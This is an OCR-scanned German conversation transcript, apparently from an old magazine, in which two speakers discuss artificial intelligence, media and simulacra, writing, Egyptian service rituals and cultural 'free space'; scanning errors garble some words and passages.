Dieser Freiraum hat früher Kirche, was hatteri 
wir noch gesagt? - Hirnlosigkeit, Zen-Budd¬ 
hismus, weißgottwas, der aber - ob das jetzt 
Zeit ist oder Raum, ist vorläufig noch egal - 
einfach Garantie von gewissen Räumen hat 
die steuermäßig von allen bewußt oder unbe¬ 
wußt bezahlt werden, aber als Dogma, als Ge¬ 
setz. . . 

p; Das, wovon du redest, ist mein Hauptkritik¬ 
punkt am Entwurf von sowas wie Künstlicher 
Intelligenz. Einen Entwurf vom Menschen zu 
machen, der auf ein Ideal angelegt ist. Auf 
Vollendung. Das sind so Dinge, die fange ich 
langsam an als große Illusionen zu durch¬ 
schauen. 

m: Es geht nicht um Vollendung. 

p- Doch. Und zwar in einer Weise, die. . . |qu 
muß den Begriff Vollendung nochmal bestirn- 



men. Jetzt muß ich ein kleines bißchen aus- 
holen: Ich bin kein großer Mathematiker, aber 
überden Computer habe ich angefangen, mich 
ein bißchen mit Geometrie zu beschäftigen, 
weil’s interessant ist und weil ich ein visueller 
Mensch bin. Man kann sich das immer gleich 
anschauen, was man ausprobiert am Compu¬ 
ter. Dabei hab ich den Begriff “Euklidische Ge¬ 
ometrie“ zum ersten Mal verstanden. Das ist die 
Lehre von idealen Grundelementen, aus denen 
die Welt besteht; die gerade Linie, die ebene 
Fläche, die kugelrunde Kugel. Ideal und Voll¬ 
kommenheit. Das sind die Urbilder in dieser 
Geometrie, und das sind Formen, die findest du 
nirgendwo in der Natur. Du findest nirgendwo in 
der Natur eine gerade Linie, du findest nir¬ 
gendwo in der Natur eine vollkommen runde 
Kugel.. . 

m: . . .außer bei Kristallen und chemischen 
Geschichten. 

p: Und auch da ist es nicht vollkommen. Es gibt 
immer mindestens sumikroskopische Fehler¬ 
haftigkeiten, Unreinheiten, Einschlüsse, Ver¬ 
schiebungen, Spielräume, Fluktuationen. Da 
jetzt herzugehen und so einen statischen, clea- 
nen Entwurf vom Menschen zu machen und 
sowas wie Künstliche Intelligenz, wo alles, das 
unrein ist und fluktuiert, was du eben mit Frei¬ 
raum bezeichnest, eliminiert und beseitigt ist, 
das hat für mich nichts mit irgendwas, was ich 
mir unter Ideal oder Vollendung vorstellen 
könnte, zu tun. 

m: Darum geht es ja in dem, was ich auszu¬ 
drücken versuche, nicht. 

p; Das ist die Möglichkeit von Kultur: Vielfalt, 
Vermischung, Diffusion, Intensitäten. . . Du 
kannst z.B. auf elektronische Weise, wenn du 
versuchst, ein Hirn zu simulieren - Transputer 
sind ein genauso rohes Modell da, aber zum 
ersten Mal in der zweiten Dimension, d.h. du 
hast nur eine Ebene von Prozessoren nebe¬ 
neinander. Da ist noch gar kein Raum. Von 
daher ist das immer noch dieselbe Höhlen¬ 
malerei. Und du hast mit elektrischem Strom 
nur die Möglichkeit: an oder aus. Du hast nicht, 
so wie die Signale im Kopf weitergeleitet wer¬ 
den nach dem, was man heute weiß, als che- 
moelektrischer Prozeß. Mit diesem Prozeß 
kannst du auch Intensitäten regeln, mit denen 
Daten oder Informationen ankommen. Du 
kannst streuen. Das kannst du mit einem elek¬ 
tronischen System nie machen. Oder nimm 
einen Organsimus: das ist ja immerein rekur¬ 
sives System. Das bezieht sich immer wieder 
auf sich selber. In der Künstlichen Intelligenz 
bezieht sich Intelligenz immer nur auf ein chi¬ 


rurgisch freitheoretisiertes Stück vom Geist, 
alles andere fehlt. 

m: Halt. Ich nagel dich jetzt kurz fest. Emotio¬ 
nale Grundlage als Basis des Denkens. Da bin 
ich nicht ganz einverstanden. 

: Schau. Die Augen melden einen Zustand, 
er Zustand wird übersetzt, also da zittert 
irgendwas den Augennerv rein und das wird als 
eine Organbefindlichkeit, und erstmal als Emo¬ 
tion wahrgenommen. 

m: Nochmal Halt. Was du jetzt grade be¬ 
schreibst, ist Reaktion. Das ist: von au ßen nach 
innen. Es gibt auch noch was anderes. 

p: Aktion. 

m: Du hast emotionale Grundlage nur als re¬ 
zeptive Geschichte gesehen, und ich geh da¬ 
von aus, daß ein menschliches Wesen... daß 
es ein paar Basiswerte, die, abgesehen von der 
elektrischen Mechanik z.B. im Computer 
101010 sein könnte, sowas wie Grundwerte in 
der Urzelle oder in der Gen-Geschichte drin 
sind, wie Triebe oder vorgegebene Emotionen 
drin sind. Egal, ob da eine Reaktion von drau¬ 
ßen da ist oder nicht. Genauso wie ich denke, 
in dem Molekül Mensch sind gewisse Basisin¬ 
formationen drin, die vollkommen selbstständig 
funktionieren. Ob da was rein- oder rausgeht, 
ist vollkommen egal.. 

p:.. .das Betriebssystem. Die DNS. 

m: Genau. Nicht nur Betriebssystem. Denn ob 
es gebraucht wird oder nicht, ist eine andere 
Frage. Und da geh’ ich weiter, daß das z.B. 
gesellschaftlich gesehen auch so ist. Und daß 
da ein paar Basisgeschichten drin sein müssen, 
daß, was ich vorher angedeutet habe, ein ge¬ 
wisser Denkfreiraum dasein muß, daß ein Mo¬ 
ralbegriff dasein muß, und der Moralbegriff ist 
eine Sprachgeschichte. Eben nicht nur zu rea¬ 
gieren auf alles, was auf mich einstürzt und die 
volle Paranoia zu kriegen. . . 






m: Das ist mir aber wieder zu einfach. 

n- Du mußt irgendwo anfangen. Klar ist das 
einfach, aber ich war schon froh, daß >ch dahin 
gekommen bin. Einfach daß du eine Nivellie¬ 
rung ziehst durch alles, ob das ein Flupeu- 
gabsturz ist oder in Äthipoien wieder Leute 
vGrhunoGrn. WGnn ich dss im TV SGhG und nicht 
darauf reagiere, das nicht unmittelbar in eine 
Handlung umsetze - ob eine symbolische oder 
eine körperliche in eine Tat, dann ist es für 
mich Unterhaltung. Wenn ich es nur wahrneh¬ 
me Wenn ich anfange und eine Entscheidung 
treffe und sage; Das ist jetzt eine Information, 
die ist für mich verbindlich, weil ich feststelle, da 
passiert was, dann ist es keine Unterhaltung. 
Das ist dann Information. 



m- Wenn du jetzt von deinem Trip, von deinem 
Ritual aus entscheidest, nur auf Blau zu rea¬ 
gieren; dann kannst du dich vollkommen künst¬ 
lich darauf trainieren, nur auf Blau zu reagieren 
und alles andere zu ignorieren. Der Mensch ist 
von seiner Rezeptionsfähigkeit her fähig, bis 
Auschwitz - das nehm ich als Ertragungs¬ 
grenze - sich vollkommen zu spezialisieren, 
wenn er will. Aber nicht für immer. 


p; Aber ich habe angesichts der Medienrealität 
es unheimlich nötig, eine Kontrollinstanz zu 
haben. Ich hab’ die Kopf-Intelligenz und ich 
hab’ die Körper-Intelligenz, und ich habe ein 
unheimliches Vertrauen in die Intelligenz mei¬ 
nes Körpers. Ich mache mal eine paradoxe 


Formulierung; Die Art und Weise wie der Kö rper 
denkt das nennt man Gefühle. Das ist für mich 
eine Kontrollinstanz gegenüber der Kopf-In¬ 
telligenz. Und das, was die Körper-Intelligenz 
erzeugt, sind Gefühle. Ich hab in der Zwi¬ 
schenzeit wieder gelernt, grade angesichts 
elektronischer Medien und des Computers, 
mich sehrsehr fein auf meine Gefühle zu ver¬ 
lassen bzw. Gefühle zu präzisieren, und die 
dann auch genau zu beschreiben versuchen, 
als eine Basis. 

m; Das ist ja viel komplizierter als du denkst, 
p; Selbstverständlich. 

m; Schon bei der Kopfintelligenz spaltet sich 
das in Simulacra, Simulation und Realismus, 
schon wenn du nur fernsiehst. 

p; Dann hab ich den Begriff Simulacra falsch 
verstanden. 

m; Du kannst vom Simulacra etwas nach¬ 
empfinden, das du im TV siehst, wenn du 
irgendeine Information in deinem Kopf ge¬ 
speichert hast, die ein Aha oder Deja-vue er¬ 
zeugt von einer Geschichte, die du schon mit¬ 
erlebt hast und nur das Visuelle.. 

p; Warum soll ich mich nicht über ein Gum- 
mi-Nilperd freuen, das irgendwo in Disneyland 
rumschwimmt? 

m; Aber du produzierst dann eine Information, 

die Simulacrain deinem Kopf wird. Auch wenn’s 

nicht stimmt. Und dann entsteht Mediamystik. 
D.h. ohne daß du’s willst, nimmst du assoziativ 
Bilder im TV auf, wo du z.B. nur auf Blau 
reagierst, weil du blaue Bilder gemalt hast. Und 
dann kriegt ein blaues Bild, das eine vollkom¬ 
men andere Realität oder einen anderen Sinn 
im TV hat, und theoretisch in Zukunft auf jedem 
Rechner, kriegt für dich über diese Assozia¬ 
tionsgeschichte einen vollkommen neuen ei¬ 
genen Wert. 

p: Das ist die Interpretationsfreiheit, die ich 
vorhin mal erwäht habe. 


m; Richtig. 

p: Die Herrschenden können nicht mehr kon¬ 
trollieren, wie die Nachrichten interpretiert wer¬ 
den. 

m; Das mein’ ich ja jetzt. Und das meinte ich 
auch vorhin; Was passiert mit einer Generation 
von Leuten, die nur mit einem Realitätsbegriff 
aufwachsen, zwischen eigener Realität- ingj. 



vidualismus-, einer Macht-Realität, die ihnen 
aufgezwungen wird - z.B. Hausdurchsuchung, 
Arbeit, ein Simulacrabegriff, den sie überhaupt 
nicht mehr kontrollieren und Sachen, die 
deklariert Simulation sind? Das sind schon ein¬ 
iges an Realitäten. 

p; Man möchte meinen, daß es langsam Zeit 
wird, daß die Transputer kommen. Daß wir 
langsam lernen, auch parallel die Realitäten zu 
verarbeiten. 

m; Die Steigerung der Schizophrenie oder der 
Psychopathie wird SO hart ansteigen und die 
Ausfälle, die es geben wird, werden SO hart 
sein. 

p; Ich mach manchmal Gedankenspiele, aber 
ich kann mir nicht andeutungsweise vorstellen, 
wie das gehen soll, parallel zu denken. Ich 
glaube trotzdem daran, daß man das trainieren 
kann. Ich mach andere Arten von Training. Z.B. 
machesmal beim Arbeiten, nachdem ich be¬ 
merkt habe, daß es keine Droge gibt, die mir 
beim Arbeiten irgendwie förderlich ist - das ist 
alles Illusion, sowohl LSD als auch Koks, da bist 
du im Zustand der Euphorisierung der Ansicht, 
daß du was Geniales geschrieben hast, und 
wenn du dann wieder nüchter bist und du liest 
das, dann hast du ziemlich heiße Luft ge¬ 
schrieben. Jetzt such ich aber immer Möglich¬ 
keiten, die Intensität ganz nach oben zu fahren. 
Einerseits hab ich diese erotischen Sachen 
gemacht, ganz alte Situation: Der Maler und 
sein Modell. Nur hab ich nicht gemalt, sondern 
geschrieben. Und das ist eine Sache, die mach’ 
ich schon lange. Das andere ist, daß ich mir 
manchmal eine Frontaltherapie geb’: Da schal¬ 
te ich den Fernseher ein ohne Ton, dann mache 
ich Musik dazu und dann kann ich das schon 
ziemlich fein dosieren, die Reizschwelle, den 
Ansturm, der kommt. Ziemlich hochfahren bis 
zu einem Pegel, wo ich genau merke: jetzt hab 
ich auf der einen Seite einen unheimlichen 
inneren Widerstand aufgebaut, der diesen An¬ 
sturm von mir fernhält, weil ich mich konzen¬ 
trieren will und schreiben. Und diesen Wider¬ 
stand aufzubauen, das ist - mit ein bißchen 
Training - unheimlich konstruktiv: dazu 
brauchst du Kraft, und diese Kraft, die man 
dabei freisetzt, die kannst du produktiv auch 
für’s Arbeiten venvenden. 

m: Das ist der heilige Antonius, die Geschichte. 

p: Das ist kein heiliger Antonius. Das ist wie 
schwarzer Kaffee. 

m: Der heilige Antonius, der drei Nächte ge¬ 
schrieben hat und gebetet hat und die Teufel 


tanzen um ihn ’rum. 
p: Ach so. 

m: Das ist auch das Stück “Wirrkopf“, was wir 
in Graz gemacht haben. (..) Wenn es auf Ent¬ 
ertainment rausläuft - da ist vielleicht deine 
Theorie von Information und Unterhaltung ganz 
wichtig - wenn die Leute nämlich alles als 
Unterhaltung ansehen, was ja auch Gefahren 
nach sich zieht - die Pop-Welt -, dann ist es für 
sie kein Problem, und dann werden sie nicht 
verrückt. Oder sie werden erst später verrückt. 
(-) 

p: Das ist ein Problem, das kenn ich vom 
Schreiben. Wenn du lernst zu schreiben, dann 
- ich hab mit vielen Kollegen schon darüber 
geredet - da fängt jeder kleine Schriftsteller 
erstmal an zu trainieren. Das sind ein paar 
Jahre, wo man sich auf die eine oder andere 
Weise in Details verliert. Du lernst, genau zu 
beobachten und du lernst, mit Sprache zu rea¬ 
gieren auf Dinge, d.h. du siehst was, du eriebst 
es fertig, aber schon etwas dezidierter, und 
dann machst du eine Formulierung daraus und 
präzisierst eine bestimmte Sache. Da hab ich 
auch hunderte von Seiten zuhaus gehabt, mit 
so kleinen Splittern. Für sich genommen wun¬ 
derbar. Immer so ein Miniatur-Universum, mit 
so einem kathedralischen Gefühl, diese Ruhe, 
wenn man auf etwas einen zweiten Blick wirft 
und diese eigenen Räume, die man da auf¬ 
spannen kann, auseinereigenen Sprache. Und 
nichts paßt zusammen. Es ist ein riesiger 
Schrotthaufen, und du kannst keine Ge¬ 
schichten schreiben. Du schreibst immer nur 
Splitter, bist gleichzeitig so einem Authentizi¬ 
tätszwang verpflichtet. Nur die Wahrheit! Ich 
kann da nicht einfach noch einen Satz dazu¬ 
schreiben, das ist nicht wirklich passiert. Auch 
so ein Realitätsproblem. Der Mut, Fiktion zu 
machen, das ist für viele Leute schon ein rich¬ 
tiger Schritt. Das ist bei mir dann wieder um¬ 
geschlagen. Ich hab das soweit getrieben, bis 
ich fast autistisch war. Also, wo ich rumgelaufen 
bin ganz hochspezialisiert in der Reaktion auf 
Sprache.. 

m:.. .alles Blau.. . 

p: . . .daß ich mich total gestört gefühlt habe, 
wenn mich irgendwer angesprochen hat. Muß 
ich noch dazusagen, weil ich da noch in Öster¬ 
reich war: In Österreich wird Mundart gespro¬ 
chen, Dialekt. Ich habe mir aber beigebracht, 
Hochdeutsch zu denken. Jetzt ist das dann so: 
Du machst eine Wahrnehmung. Dann siehst du 
einen weissen Radiergummi, auf dem ein Ho¬ 
nigtropfen liegt und glänzt. Da machst du einen 


I 



Satz draus. Das bedeutet dir wahnsinnig v^t. 
Da klingt Musik, das ist die Welt im Kleinen, die 
die Welt im Großen zeigt. Dann triffst du je¬ 
manden, den du kennst, und er erzählt m 
irgendwas, öderer fragt dich, wie s dir geht, und 
du denkst dir, du kannst ihn jetzt nicht anlacheln 
und ihm sagen: Auf einem Radiergumrni g anz- 
te ein Honigtropfen. Das ist nicht direkt kom¬ 
munizierbar. Das ist schon im Zeremoniell der 
Literatur und ist für die direkte Kommunikation 
nicht mehr geeignet. Diese Form von dem, was 
ich damals für Literatur gehalten hab. Ann En¬ 
de, da hab ich eine Liebesgeschichte gehabt, 
und ich bin manchesmal auf der Bettkante 
gesessen, nachdem wir gevögelt haben - wir 
haben uns wunderbar verstanden, es war ein 
harmonisches Verhältnis —, und ich hab mir 
gedacht: Wann ist unsere Liebesgeschichte 

endlich zuende, damit ich die Geschichte davon 

schreiben kann. Weil: eine Geschichte braucht 
einen Anfang und ein Ende. Die Literatur hat 
sozusagen gefordert, daß diese Geschichte 
zuende geht, weil ich schon ungeduldig ge¬ 
worden bin. Ich wollte die Geschichte schrei¬ 
ben. Ich bin fast verrückt geworden dabei. Da 
mußt du dann langsam in die richtigen Di¬ 
mensionen hineinfinden. 

m- Die Dimension ist. . . es gibt da zwei Ten¬ 
denzen, glaub ich, generell, in der individual- 
stischen Gesellschaft. Die eine ist ©''st s®jt ein 
paar Jahren, das sieht man auch an der Wer¬ 
bung: Jeder soll mal Urlaub machen. Freizeit. 
Ein neuer Pluralismus kommt jetzt rem. Jeder 
darf machen, kann machen, was er will. Die 
echte Demokratie.. 


(Mike macht eine Schachtel Zigaretten sorg¬ 
fältig auf) 

p: Man merkt, daß du mal im nichteuropäischen 
Ausland warst. 


m: Wieso? 

p- Da tun sie einem immer so kleine Zärtlich¬ 
keiten an. Das ist, man schämt sich hier in 
Europa ja fast, Dienstleistungen zu genießen. 
Wenn du in einem Restaurant sitzt - was hier 
sowieso nur in extram seltenen Fällen passiert 
-, und das Gefühl hast, daß du gut bedient wirst, 
das ist einfach ein Gefühl. Das ist wie eine 
Zärtlichkeit. Wenn jemand edel, mit genau der 
richtigen Dosis aus Zurückhaltung und einer in 
Jahrhunderten herangereiften Kunst, Leute zu 
bedienen und jemandem in kleiner Weise was 
Gutes zu tun. . . Du kannst hier kaum über 
sowas sprechen, ohne daß die Leute auf dich 
einschlagen als Reaktionär. Imperialist, Kolo¬ 
nialherr oder so. Es ist immer noch ein Denk¬ 


tabu auf dieser Emotion, vor allem deshalb 
auch, weil sie bei uns eh so selten ist. Es ist 
sozusagen schon mit Unlust verbunden, sich 
bedienen zu lassen. Das ist irgendwie peinlich. 
Und wie’s mir in Ägypten gegangen ist; Du 
bestellst bei einem netten Nubier in einer Bar 
einen Gin Tonic. Dann kommt der mit dem Glas, 
und du merkst an seinem Gesichtsausdruck: es 
ist jetzt eine ernste Frage, wieviele Würfel Eis 
man in einen Gin Tonic reintun soll. Es ist ein 
Problem, das man abergemeinsam bewältigen 
wird. Das hat einen gewissen Ernst, weil: Das 
ist nun dieser Augenblick. Und in diesem Au¬ 
genblick geht's darum, wie viele Würfel Eis in 
den Gin Tonic sollen. Und er hilft dir dabei, 
genau auf die richtige Art und Weise. Bringt 
dann die Eiswürfel in den Glas unter, schüttet 
das Tonic rein und holt dann noch unter seiner 
blauen Galabeja einen uralten Suppenlöffel 
raus und rührt, und auf eine ganz gemessene 
Art und Weise versetzt er das ganze in Be¬ 
wegung, vermischtdie Stoffe, stellt dirdas dann 
hin, lächelt dich an, hat seine Arbeit gut getan, 
merkt, du bist zufrieden, es geht dir gut und 
schwebt wieder weg. Das kost’ nix, wunderbar. 
Das ist Lebensqualität. Wenn sie einen 
Aschenbecher ausleeren - eine Zeremonie. 
Eine Mini-Zeremonie, aber wunderbar. Plötz¬ 
lich taucht ein Kellner hinter dir auf, und der hat 
einen leeren sauberen Glasaschenbecher. 
Dann legt erden verkehrtrum über den schmut¬ 
zigen drüber, macht eine Muschel daraus, das 
klingelt dann ein bißchen. Und du wirst schon 
aufmerksam. Interessant, da geht was vor sich 
Dann verschwindet er hinter deinem Rücken 
mit dieser Muschel in der Hand und taucht dann 
mit dem sauberen Aschenbecher wieder auf 
und stellt den hin. Ein kleines Ritual, aber wun¬ 
derbar. Die ganze Zeit solche Geschichten. 

(Das Aufnahmegerät streikt) 

p; Der Walkman will nicht. Die Maschine ist 
mein Freund, verstehst du. Er macht’s mir 
schwer, unsere heißen Gespräche aufzu¬ 
zeichnen. Erwin nicht, daß das BKA kommt und 
die Bänder mitnimmt. 

m: Dieses schlechte Gewissen Dienstleistung 
gegenüber. Ich glaube, daß diese Generation 
bis 1960 das schlechte Gewissen nicht hat. Das 
sind die ’68er. Das ist diese Generation, die 
Unken. 

p; Das ist doch die Scheiße, Mike. Wir müssen 
uns für die jetzt den Kopf zerbrechen. Die 
dummen Hunde hängen herum. 

m: Ja, aber jetzt noch ein Stück weiter: ich 
glaube, daß die Generation von Leuten über- 




haupt keine Bedenken mehr hat in der Rich¬ 
tung, sondern auf alle Reize reagiert, weil sie 
einfach nichts Befriedigendes hat. 

p; Die haben jetzt ein mörderisches Nachhol¬ 
bedürfnis. Warst du mal dort, wo ich mit dem 
Fotomodell gewohnt hab? Ganz feudale Woh¬ 
nung. 

m; War ich einmal. 

p: Da... tack. Schwarzes Loch. Gib mir mal nen 
Tip, was ich grade sagen wollte. 

m: Da in dieser Wohnung. .. 



p: Da in dieser Wohnung, da war was... 

m; Dieses mörderische Nachholbedürfnis. 

p: Jaa, tack. Danke. Und zwar, da haben wir 
Nachbarn gehabt, das waren wie von Seyfried 
gezeichnet so Alt-68er. Er war Architekt, saß 
immergrummelnd vorseinem PC herum. Hatte 
immer Nadelstreif-Latzhosen an, so ziemlich 
das Ungustiöseste, wasich mir vorstellen kann. 
Und beide hatten den Ausdruck von jahrelan¬ 
gem schweren Frust im Gesicht. Da ist mir 
einfach klargeworden, auch wie sie sich mir 
gegenüber verhalten haben, uns als Nachbarn 
gegenüber, daß die ein unheimliches Nach¬ 
holbedürfnis an Spießigkeit haben. Weil das 
was war, wogegen sie sich wohl die ganze Zeit 
wie wild abgegrenzt haben ein Jahrzehnt lang, 
wogegen sie sich gestemmt haben, und da ist 
ihnen jetzt der Saft ausgegangen. Oder sie 
haben nachgelassen und jetzt schlägt es durch. 

m: Es ist ja kein Geheimnis, daß die Bürokraten 
die faulsten Menschen überhaupt sind und sich 


zu neunzig Prozent aus diesen Leuten rekru¬ 
tieren, auch aus dem Verantwortungslosig¬ 
keitsprinzip. 

p: Was Arbeit angeht, da hab ich in Ägypten ein 
menschliches Perpetuum Mobile gesehen. Das 
war herrlich. In einem der schönsten Bauwerke 
der Welt, in dem Taltempel der Hatschepsut in 
Dar-el-Bahri. Da bin ich den ganzen Nach¬ 
mittag nurdort gesessen und war sprachlos. Da 
wird an der obersten Tempelstufe restauriert, 
ein polnisch-Ägyptisches Gemeinschaftspro¬ 
jekt. Und dieser Taltempel, der ist in eine herr¬ 
liche Kulisse reingebaut. Steht da vor Pla¬ 
teaubergen, Treppen, die sich aus den Bergen 
vor dem fruchtbaren Land in die Landschaft 
ergießen, herrlich. Dahinter-das ist in so eine 
milde Schale aus Bergen eingefaßt - steigen so 
Schutthänge zu den Steilwänden hoch. Einer 
von den Schutthängen reichte bis zu dem Rand 
von dem Tempel, wo sie grade renoviert haben. 
Da saß einer ziemlich weit unten und hat aus 
der Halde immer Steine rausgesucht, aber mit 
Überlegung, der hat selektiert nach - man 
möchte fast meinen; ästhetischen Prinzipien. 
Hat immer Steine von einer gewissen Hand¬ 
lichkeit, oder von einem bestimmten Gewicht 
rausgesucht, meinte ich zu beobachten. Hat die 
in eine Schubkarre gelegt, und wenn die Karre 
voll war, kam einer von hinten - da haben sie 
sich so einen kleinen Pfad gemacht in der 
Schutthalde - und fuhr damit zehn Meter nach 
hinten. Da haben sie ein dreigeschossiges Ge¬ 
rüst aufgebaut, Stahlrohrkonstruktion, wildest. 
Da ging, über drei Ebenen verschoben, bis auf 
die erste und zweite Ebene ein Flaschenzug, 
und da haben sie dann die Schubkarre einge¬ 
klinkt und hochgezogen und ein Meterchen 
rübergefahren zum nächsten Flaschenzug von 
der zweiten auf die dritte Ebene. Da stand dann 
wieder einer und hat das hochgezogen. Dann 
stand die Schubkarre also oben. Dann kam 
wieder einer, der mit der Schubkarre dann oben 
so einen kleinen Pfad, den sie gemacht haben, 
wieder die Richtung zurückfuhr und die Steine 
aus der Schubkarre die Halde runtergeschüttet 
hat. Und die Steine sind dann wieder ungefähr 
dort hingekollert, wo der Mann saß, der immer 
die Steine sortierte. Und das hab ich mir immer 
wieder den Nachmittag hindurch angeschaut. 
Ich weiß nicht, ich glaub das machen die seit 
5000 Jahren. Da sitzen die dort, nurdas Gerüst 
haben sie jetzt neu gekriegt, und tragen die 
Steine im Kreis herurn. Es ist unglaublich. Ich 
weiß auch, warum die Ägypter so müde sind. So 
nachlässig und faul manchmal. Die sind immer 
noch müde vom Pyramidenbauen. Die versu¬ 
chen seit 4000 Jahren, sich zu erholen. Das 
muß eine derartige Schufterei gewesen sein. 
Mumford hat ja gesagt, das war die erste Ma- 




schine, die Menschenstruktur beim Pyrami¬ 
denbau. (..) 


radikal die auch sind. In dem Augenblick, in dem 
du militärische Aktionen machst, verläßt du den 
Freiraum. 


m- Stellvertreterkultur: In gewissen Kulturen 
kommst du wieder zu dem sozialen Code, uer 
soziale Code, der eine Investition aller ist. Die 
Motivation, oder die Art und Weise, wie es 
nassiert ist im Grunde genommen vollkommen 
S öder unterschiedlich. Ob das Jetö ein 
Gebet ist oder eine Steuerzahlung. Nicht Kom 
munikation, das unterscheidet sich insofern: Es 
qibt im französischen den Ausdruck Lac de 
nratuit. Das Geschenk, Shestus in Indien, wo 
die Leute hingehen, wenn sie nichts ^u ^ssen 
haben und Essen vor die Götterstatue stellen. 
Oderim Mittelalter werden riesige Kirchen, Do¬ 
me gebaut, mitten in der Landschaft, wo die 
Leute nebendran in irgendwelchen Hutten pen¬ 
nen und leben und kaum was zu essen haben, 
und aber in diesem Dom nichtmal 'eben, was ja 
fürden heutigen Begriff von Leben, Loft, Besser 
Wohnen. . . heute hat jeder im Kopf. Ich bin 
Pharao, ich möchte leben wie ein Gott. 

d: Hab’ ich vorhin doch gesagt: Die Aristokratie 
kommt wieder. Jeder ist ein König, jeder ist ein 
Pharao. Du hast deine Sklaven am Schreibtisch 
stehen. Du hast deinen Computer. 

m-Aber die Funktion der Aristokratie war in den 
letzten 200, 300 Jahren was anderes, namhch 
die Garantie für diesen Freiraum, für kultur^le 
Verfeinerungen, für Basis, vyenn bas Geld nicht 
da war, wenn die Möglichkeiten i^'^bt da waren, 
die Leute nichts zu essen hatten, die yolks¬ 
suppe. Oder die reichen Leute, die einfach 
soundsoviele Leute mitgefüttert halDen, oder 
die Organisation von Volksfesten, die Organi¬ 
sation oder Mitfinanzierung von gewissen so¬ 
zialen Freiräumen, wo die Aristokratie biesen 
Großmut und diese Geschichte übernommen 
hat. Als Gegenbeispiel des l^ulturellen Pro¬ 
blems heute: Mietet sich ein Mensch eine Wo^ 
nung und nimmt sie nicht, weil ersagt. Ich nehm 
lieber eine Dreizimmerwohnung, weil da ist 
sonst ein Zimmer zu viel, oder bas muß ja 
wenigstens ein Gästezimmer sein oder eine 
Funktion haben. Also eine Wohnung zu mieten 
in der ein Zimmer vollkommen frei besteht, das 
existiert fast nicht. 

p: Du bistdirdarüberim klaren, was du sagst mit 
deinen Freiräumen? Daßdas letztlich bedeutet, 
daß der größte verallgemeinerbare Freiraum 
der ist der uns vom Militär freigehalten wird. 
Nämlich der Freiraum, den man so Zivilisation 
nennt der zivile Bereich. Das, wo du Zivilist sein 
kannst, wo du ohne Kampfhandlungen deine 
Socken kriegst, deine restlichen sozialen Akti¬ 
vitäten abwickeln kannst, wie weit die oder wie 


m- Hat gar nix damit zu tun. Militärischer Frei- 
raum, das Exempel gefällt mir nicht so.. 

p- Wieso nicht? Ich finde manchesmal militäri¬ 
sche Denkmodelle interessant. Wenn ich mir 
eine Landschaft anschaue, frag ich mich 
manchmal, wie wohl ein General die Land¬ 
schaft sieht. Ich schau mit dem ästhetischen 
Auge drauf, und der General zieht seine Ver- 
sorgungslinien und Vormarschlinien durch, 
egal ob da ein Haus steht oder ein Flu ß ist. Der 
sagt: die Panzer fahren da durch, und die fah¬ 
ren in einem geraden Strich da durch. Das ist 
wie beim Landvermessen. 

m: Das ist aber jetzt eine andere Geschichte. 
Du gehst vom General aus, du hast jetzt wieder 
das mit den Pharaonen etwas falsch verstan¬ 
den, vielleicht wieder von mir nicht richtig er¬ 
klärt. Mir geht es immer noch um den sozialen 
Code. Ein sozialer Code ist ein gemeinsames 
Gefühl von gemeinsam investieren, das ist eine 
Geschichte. Muß es aber nicht sein. Aber so 
eine Geschichte kann auch eine funktionsfreie 
Kommunikationsebene sein. Das Erste ist eine 
Ruhe, die Gedanken in einem Raum sind, will 
nicht sagen: frei, aberwenn ich dran denke, daß 
ich in zwei Stunden, drei, fünf Stunden was zu 
tun habe, sind meine Gedanken von der Kon¬ 
zentration im Grunde genommen schon woan¬ 
ders. Irgendwo ist da ein Warteprogramm, ob 
Kaffeekochen oder egal was. Wenn ich aber 
hingehe und z.B. - Thailand, das System der 
buddhistischen Klöster, wo jeder Thailänder — 
das ist in Nepal ebenso -, einmal in seinem 
Leben in dieses Kloster reingeht und, als so¬ 
ziale Verantwortung getarnt: ich muß was für 
Buddha undsoweiter tun, aber im Grund jede 
soziale Verantwortung auch wieder abgibt, in 
dieses Kloster reingeht. Geht auch Axel Sprin¬ 
ger, drei Wochen wird er zum Mönch. Und Axel 
Springer gerät in ein anderes System ohne 
einen Freiraum, wo er morgens um 6 aufstehen 
muß, vollkommen demokratisch, alle den Kopf 
rasiert undsoweiter, und auf die Straße gehen 
muß und seinen Reis betteln muß. Vollkommen 
gleich behandelt. Also Axel Springer, stell dir 
vor, geht hier ins Trapistenkloster. Was kriegt 
er?’Er kriegt erstmal eine separate Kapelle, er 
kriegt einen Fernseher in die Zelle, Privileg, 
geschichte. Ich erklär’ das Problem, daß diese 
Gleichheit, diese Demut in diesem zwar vor¬ 
gegebene Konzept, wo jeder weiß, daß es 
abstrakt ist, akzeptiert wird und als sozialer 
Code gesellschaftlich. Jeder ist durch diese 
Demut durchgegangen. Frau wie Mann. Und 


4 



diese Geschichte - diese Systeme von Frei¬ 
raum - ist in jeder Kultur nötig. 

p: Ich hab’ dir schon vorhin erzählt-da hab’ ich 
vielleicht dieses Wort nicht gebraucht wie ich 
die Geschichte der Hand beschrieben habe, die 
ich am Computer zu konstruieren versucht ha¬ 
be. Da entsteht sowas wie Demut. Nämlich 
angesichts dessen, was die Maschine nicht 
kann. Das wird für mich ein Negativabgleich. 
Die Maschine ist kein Mensch, mit dem ich das 
gleiche Erlebnis hab’, aberdie Maschine ist ein 
Modell vom Menschen. Ich habe neulich in 
einer Diskussion selber eingeworfen, wenn 
man schon versucht, immer perfektere Modelle 
vom Menschen zu konstruieren - also die Idee 
weitergedacht - im Computer, warum nimmt 
man da nicht gleich lebendige Menschen. Das 
ist sozusagen das Perfekteste, was es in der 
Bauserie im Augenblick gibt. Da, hat Vic ge¬ 
sagt, kannst du z.B. nicht an beliebiger Stelle 
Prozesse unterbrechen, das Ding aufmachen, 
reingehen und an jeder beliebigen Stelle Zu¬ 
stände ablesen. 

m; Das war aber möglich. Das ist in Kulturen 
möglich gewesen, wo z.B. in gewissen religiö¬ 
sen Ritualen Medien und Material waren. Skla¬ 
ven eines Konzeptes, genauso wie die Pyra¬ 
miden. Klar wird das negativ gewertet, wenn 
man sagt: Der Mensch als Maschine, oder als 
Teil der Maschine. Aber in so einer Geschichte 
ist natürlich als Gemeinsamkeit ein Teil von so 
einer Geschichte zu sehen. Ist natürlich ein 
Erlebnis, wo irgendwelche Massengefühle 
erstmal. . . braucht man eine Maschine, um 
einen Menschen zu simulieren. Eins. Und zwar 
ist das intellektuelle Niveau dermaßen Kom¬ 
munikation, two ways, so verdammt reduziert. 
Und das gleiche ist mit dem Fernsehen. Und auf 
dem dritten Level kann man sagen: Daß zum 
Beispiel das Allerhöchste an Qualität, von Mas¬ 
